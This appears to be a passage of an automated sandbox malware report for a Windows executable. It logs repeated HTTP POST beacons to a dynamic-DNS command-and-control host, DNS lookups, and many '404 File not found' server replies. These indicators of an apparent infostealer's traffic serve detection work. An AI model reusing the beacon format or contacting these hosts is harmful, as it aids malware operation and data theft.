Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00404ED4 recv,

6_2_00404ED4

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
Source: global traffic	DNS traffic detected: DNS query: freighteighttwocam.ddns.net

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:51 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
